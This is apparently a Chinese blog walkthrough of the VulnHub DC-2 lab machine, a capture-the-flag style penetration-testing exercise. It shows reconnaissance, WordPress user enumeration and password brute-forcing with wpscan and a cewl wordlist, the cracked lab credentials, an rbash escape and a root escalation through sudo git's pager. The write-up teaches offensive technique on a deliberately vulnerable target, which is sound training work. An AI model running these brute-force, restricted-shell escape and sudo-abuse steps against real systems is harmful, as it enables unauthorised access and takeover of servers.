VulnHub-DC-2靶机渗透教程

VulnHub-DC-2靶机渗透教程

1.靶机部署

**Onepanda**\] Mik1ysomething 靶机下载:[https://download.vulnhub.com/dc/DC-2.zip](https://download.vulnhub.com/dc/DC-2.zip "https://download.vulnhub.com/dc/DC-2.zip") 直接使用VMware导入打开就行 ![](https://i-blog.csdnimg.cn/direct/14c9f4f6cfae42faadd03bb39870c336.png) ### 2.信息收集 #### 2.1 获取靶机ip(arp-scan/nmap) ``` arp-scan -l ​ nmap 192.168.135.0/24 ``` ![](https://i-blog.csdnimg.cn/direct/0c370d622f6c4cccb27fba611a23eb4f.png) #### 2.2 详细信息扫描(nmap) ``` nmap -sS -T5 -sC -p- --min-rate 10000 192.168.135.136 nmap -sS -p---min-rate 10000 $ip ``` 发现开放了80端口,访问一下看看 ![](https://i-blog.csdnimg.cn/direct/7ce883f4e91b493a8246d5817dfb71a0.png) 发现访问不了,且发现我们输入的ip地址自动转化为了域名,我们想到dc-2这个域名解析失败,我们更改hosts文件,添加一个ip域名指向。 ![](https://i-blog.csdnimg.cn/direct/2a98ffe4ff6646dc838d6fec2f12528a.png) ![](https://i-blog.csdnimg.cn/direct/f17f13b398b14dbcb3da6342b2f33b82.png) 添加之后,再次访问,访问成功发现是wordpress的站点 ![](https://i-blog.csdnimg.cn/direct/5179c035b17c4472af87682fc9516409.png) #### 2.3 敏感目录扫描(dirsearch/dirb/gobuster/御剑/7bscan) ``` dirsearch -u http://192.168.135.136 -e * dirb http://192.168.135.136 ``` ![](https://i-blog.csdnimg.cn/direct/2c893af6f97947c3a51d96c4977ea5d0.png) #### 2.4 指纹收集(whatweb) ``` whatweb -v 192.168.135.136 ``` ![](https://i-blog.csdnimg.cn/direct/15b997ba03214841bccac71fbdcfb855.png) ### 3.渗透过程 #### flag1 在网页下面我们发现flag ![](https://i-blog.csdnimg.cn/direct/c68b24d632a6445e8f1ed71559af57e1.png) 点进去发现flag1 flag1的意思:大概就是尝试暴力破解,获取账号密码,使用用户登录吧 ``` 你通常的单词列表可能不起作用,所以,也许你只是得小心点。 更多的密码总是更好,但有时你就是赢不了他们都是。 以一个身份登录,以查看下一个标志。 如果你找不到它,就以另一种身份登录。 ``` ![](https://i-blog.csdnimg.cn/direct/ba24486fa6e0440c98d83512c256645d.png) 前面信息收集时候发现后台地址:[http://dc-2/wp-login.php?redirect_to=http%3A%2F%2Fdc-2%2Fwp-admin%2F\&reauth=1](http://dc-2/wp-login.php?redirect_to=http%3A%2F%2Fdc-2%2Fwp-admin%2F&reauth=1 "http://dc-2/wp-login.php?redirect_to=http%3A%2F%2Fdc-2%2Fwp-admin%2F&reauth=1") ![](https://i-blog.csdnimg.cn/direct/ee05d9fe60f84377aeaaa8b492c66226.png) ![](https://i-blog.csdnimg.cn/direct/3dbbab1500df4718b3b005fcb2149aae.png) 这是一个wordpress的站,我们采用专门针对wordpress的工具wpscan来进行扫描进行用户枚举 ``` Wpscan一些常用用法: wpscan --url http://dc-2 获取版本信息4.7.10 wpscan --url http://dc-2 --enumerate p 扫描插件 wpscan --url http://dc-2 --enumerate u 枚举用户 > admin/jerry/tom ``` ![](https://i-blog.csdnimg.cn/direct/8c00d44ab0d743348c5066e962c453ea.png) ![](https://i-blog.csdnimg.cn/direct/989b4044cb9e41c6ac7eae52155ce47f.png) 根据flag1提示使用暴力破解,首先使用cewl命令行工具,对网站进行生成字典,保存到passwd.txt当中,然后使用wpscan爆破 ``` cewl http://dc-2/ > password.txt wpscan --url http://dc-2 --passwords password.txt ``` ![](https://i-blog.csdnimg.cn/direct/0207af0157bd4102babe1eeee66b4d0a.png) 爆破出来两个账号 ``` jerry/adipiscing tom/parturient ``` ![](https://i-blog.csdnimg.cn/direct/1897d8250b4549cb824ed26bbee7a613.png) #### flag2 使用爆破的用户名登录网站,两个账户都可以 ![](https://i-blog.csdnimg.cn/direct/9a17ba37f37d4531bc7980f8b49c104f.png) 这里有许多功能点,我们挨个点点,发现在pages下发现flag2 ![](https://i-blog.csdnimg.cn/direct/d4b06794aded40fdb687e94f75407545.png) ![](https://i-blog.csdnimg.cn/direct/75bacb66603546f494b17c4730c25f23.png) flag提示:简单点可能可以试试别的方式,比如ssh/ftp别的服务。 ``` If you can't exploit WordPress and take a shortcut, there is another way. 如果你不能利用WordPress并采取一条捷径,还有另外一种方法。 Hope you found another entry point. 希望你找到了另一个入口。 ``` #### flag3 这里还有另外一个tom用户可以尝试ssh连接,前面信息收集发现7744端口也是打开的。 ``` jerry/adipiscing tom/parturient ssh [email protected] -p 7744 ``` 登录成功发现在tom的目录下发现flag3 ![](https://i-blog.csdnimg.cn/direct/31bc0151cb154eb5bc6c7e9603b4c0b0.png) 但这里我尝试cat发现命令用不了,vim也不行,但是用vi/less可以 ![](https://i-blog.csdnimg.cn/direct/7e2f7ff42a7641398ad49ae3de92b302.png) 提示:可怜的老汤姆总是追着杰瑞跑。也许他应该为自己造成的压力承担责任。(su命令提示) 我们尝试切换到另外一个jerry用户发现没有su命令 ![](https://i-blog.csdnimg.cn/direct/a421251f3c9b4c988865f7ab1cecc06b.png) 另外也提示到我们需要rbash逃逸 查看一下可以使用的命令 ``` echo $PATH ``` ![](https://i-blog.csdnimg.cn/direct/d2351954f2c044c8afb6f097182500a9.png) 使用echo绕过rbash ``` BASH_CMDS[su]=/bin/sh;su export PATH=$PATH:/bin/ export PATH=$PATH:/usr/bin echo /* su jerry 输入前面爆破的密码 ``` ![](https://i-blog.csdnimg.cn/direct/016a3025fcc44297bad31dab7c2b4533.png) #### flag4 ``` cd jerry ls cat flag4.txt ``` 在jerry的目录下发现flag4 ![](https://i-blog.csdnimg.cn/direct/d8e314ea1e8d4eff975f8461a3e223ed.png) 提示信息如下: ``` Good to see that you've made it this far - but you " re not home yet . 很高兴看到你走了这么远,但你还没回家。 You still need to get the final flag (the only flag that really counts!!! ). 您仍然需要获得最后的标志(唯一真正重要的标志!) No hints here 一you're on your own now. :- ) 这里没有暗示,一,你现在只能靠自己了。*-) Go on 继续 git outta here!!!! ``` 最后肯定是需要提权获取到最后一个flag,提示到git,可能是需要git提权。 #### flag5 ``` sudo -l ``` 发现jerry无需root权限执行git ``` 查看一下可以使用的root权限命令 find / -user root -perm -4000 -print 2>/dev/null ``` ![](https://i-blog.csdnimg.cn/direct/faf075f33ea5490dab108cf55b3feb54.png) 这里sudo/su都需要root权限,我们这里只能使用git命令,并使用git命令提权 ``` sudo git branch --help config ​ sudo git branch --help status ​ !/bin/sh ``` ![](https://i-blog.csdnimg.cn/direct/c0b21e163c1747b987bbb58ede35b2a1.png) 提权成功 ![](https://i-blog.csdnimg.cn/direct/9dd908df128944ed8bec4c050c7930c4.png) 发现最后一个flag ``` cd /root ​ ls ​ cat final-flag.txt ``` ![](https://i-blog.csdnimg.cn/direct/e9dc80121c4c4d689426cd3a45a1e3bf.png) 本篇文章渗透结束 感谢大家的观看!!

相关推荐
高冷的肌肉码喽24 分钟前
Linux-进程间的通信
linux·运维·服务器
乖乖是干饭王28 分钟前
Linux系统编程中的_GNU_SOURCE宏
linux·运维·c语言·学习·gnu
jekc86835 分钟前
禅道18.2集成LDAP
linux·运维·服务器
weixin_4349362842 分钟前
k8S 命令
linux·容器·kubernetes
weixin_307779131 小时前
Linux下GCC和C++实现统计Clickhouse数据仓库指定表中各字段的空值、空字符串或零值比例
linux·运维·c++·数据仓库·clickhouse
yzx9910133 小时前
Linux 系统中的算法技巧与性能优化
linux·算法·性能优化
fengyehongWorld3 小时前
Linux Docker的简介
linux·docker
曹瑞曹瑞4 小时前
VMware导入vmdk文件
linux·运维·服务器
Johny_Zhao4 小时前
2025年6月Docker镜像加速失效终极解决方案
linux·网络·网络安全·docker·信息安全·kubernetes·云计算·containerd·yum源·系统运维
hello kitty w4 小时前
Python学习(7) ----- Python起源
linux·python·学习